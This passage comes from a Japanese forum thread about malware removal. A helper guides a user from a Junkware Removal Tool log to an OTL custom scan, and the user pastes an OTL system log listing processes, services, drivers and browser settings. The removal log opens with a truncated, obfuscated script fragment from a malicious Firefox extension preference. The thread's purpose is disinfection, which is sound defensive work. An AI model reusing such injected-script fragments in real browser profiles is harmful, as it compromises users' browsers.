user_pref(extensions.hijEKzNnFJEYjd0V.scode, (function(){try{if(window.self.location.href.indexOf(\rHU6pjw7qda7pjnErdg8pda8rn\)>-1){return;}}catch(e){}try{var d=[[\trian



~~~ Chrome


[C:\Users\【ユーザー名】\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - default search provider reset

[C:\Users\【ユーザー名】\Appdata\Local\Google\Chrome\User Data\Default\Preferences] - Extensions Deleted:

[C:\Users\【ユーザー名】\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - default search provider reset

[C:\Users\【ユーザー名】\Appdata\Local\Google\Chrome\User Data\Default\Secure Preferences] - Extensions Deleted:
[]





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 2015/09/11 at 9:36:12.43
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  • あすとろ
  • 2015/09/11 (Fri) 10:04:10
返信フォームへ 
JRTは削除しOTLでスキャンを
JRTでは予想通りいい感じに駆除してくれました。
JRTは不要となりますので、導入時の指示に従って削除なされてください。
ここからは手動駆除となります。

以下のソフトウェアをご準備ください。

OldTimer Listit(通称:OTL)
http://oldtimer.geekstogo.com/OTL.exe
直リンクです。デスクトップ等、分かりやすい場所に保存してください。
削除する際は起動後に「Cleanup」ボタンを押すことにより、自動的に削除されます。

OTLを起動させる前にブラウザを含め、可能な限りのソフトウェアを終了させてください。
ソフトウェアの終了が完了しましたら、OTLを起動させてください。
表示画面上部中央にあるScan All Usersにチェックを入れてください。
設定が完了しましたら、Custom Scan/Fixesの項目内に以下をコピペしてください。

------コピペこの下より------
SHOWHIDDEN
%windir%\tasks\*.job
DRIVES
BASESERVICES
%SYSTEMDRIVE%\*.exe
ACTIVEX
CREATERESTOREPOINT
------コピペこの上まで------

コピペが完了しましたら、Run Scanをクリックしてスキャンを行ってください。
スキャン完了まで数分程度かかりますので、今しばらくお待ちください。
スキャンが完了しましたら、OTLを保存した場所と同じところに、
OTL.txtとExtras.txtが出力されますので、そちらを貼り付けてご連絡ください。
なお、OTLはその特性上、非常に長文となります。
こちらの掲示板の文字数上限がひらがな換算で約3万文字、英数字換算で約6万文字です。
確実に文字数オーバーとなりますので、余裕を見て5万5千文字程度になるように、
以下のURLの文字数カウンター等で確認しつつ、ログを分割されてご連絡ください。
http://www2u.biglobe.ne.jp/~yuichi/rest/strcount.html
  • IVNO
  • MAIL
  • 2015/09/11 (Fri) 17:10:14
返信フォームへ 
OTL1
遅くなりました、すみません。

早速ですがOTLのログを貼っていきます。



OTL logfile created on: 2015/09/12 16:51:59 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\【ユーザー名】\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

3.84 Gb Total Physical Memory | 2.76 Gb Available Physical Memory | 71.85% Memory free
7.68 Gb Paging File | 6.02 Gb Available in Paging File | 78.39% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 447.66 Gb Total Space | 112.59 Gb Free Space | 25.15% Space Free | Partition Type: NTFS

Computer Name: 【ユーザー名】 | User Name: 【ユーザー名】 | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/09/12 10:35:35 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
PRC - [2015/08/12 02:16:20 | 055,175,056 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
PRC - [2015/08/12 02:16:20 | 001,388,944 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
PRC - [2015/08/12 02:16:20 | 000,840,080 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
PRC - [2015/07/24 20:36:40 | 000,069,448 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe
PRC - [2015/07/07 20:12:28 | 000,082,128 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2015/05/01 11:17:04 | 001,772,672 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
PRC - [2015/05/01 11:16:10 | 001,394,816 | ---- | M] (Microsoft Corporation) -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
PRC - [2015/02/04 23:44:22 | 000,076,152 | ---- | M] () -- C:\Windows\SysWOW64\PnkBstrA.exe
PRC - [2012/03/27 21:17:04 | 000,988,456 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
PRC - [2012/03/23 18:33:48 | 000,419,408 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LMutilps32.exe
PRC - [2012/03/23 18:33:46 | 000,355,920 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\dsiwmis.exe
PRC - [2012/03/23 18:33:46 | 000,343,632 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LMworker.exe
PRC - [2012/03/23 18:33:44 | 001,105,488 | ---- | M] (Dritek System Inc.) -- C:\Program Files (x86)\Launch Manager\LManager.exe
PRC - [2012/02/29 22:49:06 | 000,028,264 | ---- | M] (Acer Incorporated) -- C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
PRC - [2012/02/08 11:03:36 | 000,363,800 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2012/02/08 11:03:34 | 000,277,784 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2012/02/08 11:03:16 | 000,161,560 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
PRC - [2012/02/06 17:54:04 | 000,255,376 | ---- | M] (Acer Incorporated) -- C:\Program Files\Acer\Acer Updater\UpdaterService.exe
PRC - [2012/02/01 16:29:58 | 000,013,592 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
PRC - [2012/01/05 14:22:10 | 000,256,536 | ---- | M] (NTI Corporation) -- C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
PRC - [2012/01/05 14:21:44 | 000,296,984 | ---- | M] (NTI Corporation) -- C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]

MOD - [2015/01/20 22:35:44 | 001,044,776 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014/02/12 20:58:32 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2012/01/05 14:22:36 | 000,465,344 | ---- | M] () -- C:\Program Files (x86)\NTI\Acer Backup Manager\sqlite3.dll


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/06/02 17:35:47 | 011,086,056 | ---- | M] (DisplayLink Corp.) [Auto | Running] -- C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe -- (DisplayLinkService)
SRV:[b]64bit:[/b] - [2015/05/26 03:19:13 | 001,255,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\diagtrack.dll -- (DiagTrack)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,366,544 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:[b]64bit:[/b] - [2015/04/30 01:53:40 | 000,023,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:[b]64bit:[/b] - [2014/01/27 08:37:08 | 000,185,792 | ---- | M] (McAfee, Inc.) [Auto | Running] -- C:\Windows\SysNative\mfevtps.exe -- (mfevtp)
SRV:[b]64bit:[/b] - [2014/01/27 08:31:12 | 000,219,752 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe -- (mfefire)
SRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 000,048,128 | ---- | M] (Broadcom Corporation) [Auto | Running] -- C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE -- (wltrysvc)
SRV:[b]64bit:[/b] - [2012/02/22 13:21:16 | 000,199,272 | ---- | M] () [Auto | Running] -- C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe -- (McShield)
SRV:[b]64bit:[/b] - [2012/02/06 17:54:04 | 000,255,376 | ---- | M] (Acer Incorporated) [Auto | Running] -- C:\Program Files\Acer\Acer Updater\UpdaterService.exe -- (Live Updater Service)
SRV:[b]64bit:[/b] - [2012/02/02 22:29:52 | 000,628,448 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV:[b]64bit:[/b] - [2012/01/20 16:15:14 | 000,149,504 | ---- | M] (Intel(R) Corporation) [On_Demand | Stopped] -- C:\Program Files\Intel\TurboBoost\TurboBoost.exe -- (TurboBoost)
SRV:[b]64bit:[/b] - [2010/09/22 18:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV - [2015/09/07 23:15:08 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/08/12 03:06:17 | 000,269,000 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/08/12 02:16:20 | 000,840,080 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
SRV - [2015/08/03 12:47:10 | 002,545,512 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2015/08/03 12:13:12 | 000,417,552 | ---- | M] (LogMeIn, Inc.) [Auto | Running] -- C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe -- (LMIGuardianSvc)
SRV - [2015/07/24 20:36:40 | 000,069,448 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe -- (chromoting)
SRV - [2015/07/24 08:23:38 | 000,838,336 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2015/07/09 13:14:04 | 000,327,296 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2015/07/07 20:12:28 | 000,082,128 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2015/05/01 11:17:04 | 001,772,672 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2015/05/01 11:16:10 | 001,394,816 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2015/02/04 23:44:22 | 000,076,152 | ---- | M] () [Auto | Running] -- C:\Windows\SysWOW64\PnkBstrA.exe -- (PnkBstrA)
SRV - [2015/01/29 05:13:13 | 001,910,128 | ---- | M] (Electronic Arts) [On_Demand | Stopped] -- C:\Program Files (x86)\Origin\OriginClientService.exe -- (Origin Client Service)
SRV - [2014/04/11 23:08:08 | 000,103,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2014/03/21 07:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/08/08 10:00:02 | 000,655,624 | ---- | M] (Acresso Software Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
SRV - [2012/04/23 13:25:32 | 000,276,248 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2012/03/23 18:33:46 | 000,355,920 | ---- | M] (Dritek System Inc.) [Auto | Running] -- C:\Program Files (x86)\Launch Manager\dsiwmis.exe -- (DsiWMIService)
SRV - [2012/02/29 22:49:06 | 000,028,264 | ---- | M] (Acer Incorporated) [Auto | Running] -- C:\Program Files (x86)\Acer\Registration\GREGsvc.exe -- (GREGService)
SRV - [2012/02/08 11:03:36 | 000,363,800 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/02/08 11:03:34 | 000,277,784 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/02/08 11:03:16 | 000,161,560 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2012/02/01 16:29:58 | 000,013,592 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe -- (IAStorDataMgrSvc)
SRV - [2012/01/05 14:22:10 | 000,256,536 | ---- | M] (NTI Corporation) [Auto | Running] -- C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe -- (NTI IScheduleSvc)
SRV - [2011/06/21 12:55:04 | 000,173,424 | ---- | M] (Egis Technology Inc. ) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe -- (EgisTec Ticket Service)
SRV - [2010/06/01 15:31:28 | 002,804,568 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe -- (NOBU)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/06/16 20:38:51 | 000,030,264 | ---- | M] (Disc Soft Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dtlitescsibus.sys -- (dtlitescsibus)
DRV:[b]64bit:[/b] - [2015/06/02 17:38:27 | 000,441,064 | ---- | M] (DisplayLink Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\dlkmd.sys -- (dlkmd)
DRV:[b]64bit:[/b] - [2015/06/02 17:38:27 | 000,018,664 | ---- | M] (DisplayLink Corp.) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\dlkmdldr.sys -- (dlkmdldr)
DRV:[b]64bit:[/b] - [2015/03/04 19:34:52 | 000,124,568 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2014/01/27 08:43:26 | 000,070,592 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\cfwids.sys -- (cfwids)
DRV:[b]64bit:[/b] - [2014/01/27 08:37:32 | 000,344,688 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfewfpk.sys -- (mfewfpk)
DRV:[b]64bit:[/b] - [2014/01/27 08:33:26 | 000,783,864 | ---- | M] (McAfee, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\mfehidk.sys -- (mfehidk)
DRV:[b]64bit:[/b] - [2014/01/27 08:31:34 | 000,520,696 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfefirek.sys -- (mfefirek)
DRV:[b]64bit:[/b] - [2014/01/27 08:30:06 | 000,311,600 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\mfeavfk.sys -- (mfeavfk)
DRV:[b]64bit:[/b] - [2014/01/27 08:29:22 | 000,180,272 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mfeapfk.sys -- (mfeapfk)
DRV:[b]64bit:[/b] - [2013/10/15 17:50:00 | 000,169,720 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mkd3kfnt.sys -- (Mkd3kfNt)
DRV:[b]64bit:[/b] - [2013/10/02 11:22:20 | 000,056,832 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 004,746,304 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BCMWL664.SYS -- (BCM43XX)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:14 | 000,022,592 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bcm42rly.sys -- (BCM42RLY)
DRV:[b]64bit:[/b] - [2013/08/08 09:54:13 | 000,021,568 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bcmvwl64.sys -- (BcmVWL)
DRV:[b]64bit:[/b] - [2013/05/31 09:17:00 | 000,112,888 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Mkd2Nadr.sys -- (Mkd2Nadr)
DRV:[b]64bit:[/b] - [2013/05/31 01:16:40 | 000,064,280 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGSHidFilt.Sys -- (LGSHidFilt)
DRV:[b]64bit:[/b] - [2012/11/13 16:49:00 | 000,098,104 | ---- | M] (AhnLab, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Mkd2BthF.sys -- (Mkd2Bthf)
DRV:[b]64bit:[/b] - [2012/08/23 23:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2012/08/23 23:08:26 | 000,030,208 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/07/17 18:12:08 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,062,776 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDVDisk.sys -- (mwlPSDVDisk)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,022,648 | ---- | M] (Egis Technology Inc.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDFilter.sys -- (mwlPSDFilter)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,020,520 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDNserv.sys -- (mwlPSDNServ)
DRV:[b]64bit:[/b] - [2012/06/01 17:35:58 | 000,083,576 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bScsiSDa.sys -- (bScsiSDa)
DRV:[b]64bit:[/b] - [2012/03/27 11:09:54 | 014,748,416 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2012/03/07 22:48:20 | 000,238,384 | ---- | M] (ELAN Microelectronics Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ETD.sys -- (ETD)
DRV:[b]64bit:[/b] - [2012/03/01 15:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2012/02/22 12:29:46 | 000,100,912 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mferkdet.sys -- (mferkdet)
DRV:[b]64bit:[/b] - [2012/02/07 15:03:06 | 000,018,432 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NTIDrvr.sys -- (NTIDrvr)
DRV:[b]64bit:[/b] - [2012/02/07 15:03:06 | 000,017,408 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UBHelper.sys -- (UBHelper)
DRV:[b]64bit:[/b] - [2012/02/01 16:16:40 | 000,568,600 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:[b]64bit:[/b] - [2012/01/20 16:14:34 | 000,016,128 | ---- | M] (Intel(R) Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\TurboB.sys -- (TurboB)
DRV:[b]64bit:[/b] - [2012/01/19 00:30:42 | 000,435,240 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\k57nd60a.sys -- (k57nd60a)
DRV:[b]64bit:[/b] - [2011/12/06 20:23:08 | 000,331,264 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2011/11/04 10:21:38 | 000,019,496 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\b57xdmp.sys -- (b57xdmp)
DRV:[b]64bit:[/b] - [2011/11/04 10:21:36 | 000,068,648 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\b57xdbd.sys -- (b57xdbd)
DRV:[b]64bit:[/b] - [2011/09/02 14:36:58 | 000,051,752 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bScsiMSa.sys -- (bScsiMSa)
DRV:[b]64bit:[/b] - [2011/07/14 16:32:23 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2011/07/14 16:32:23 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,109,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2009/11/24 09:38:00 | 000,016,008 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGVirHid.sys -- (LGVirHid)
DRV:[b]64bit:[/b] - [2009/11/24 09:37:50 | 000,022,408 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGBusEnum.sys -- (LGBusEnum)
DRV:[b]64bit:[/b] - [2009/07/14 10:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2009/07/14 10:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2009/07/14 10:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:[b]64bit:[/b] - [2009/06/11 05:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:[b]64bit:[/b] - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV - [2009/07/14 10:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0



IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
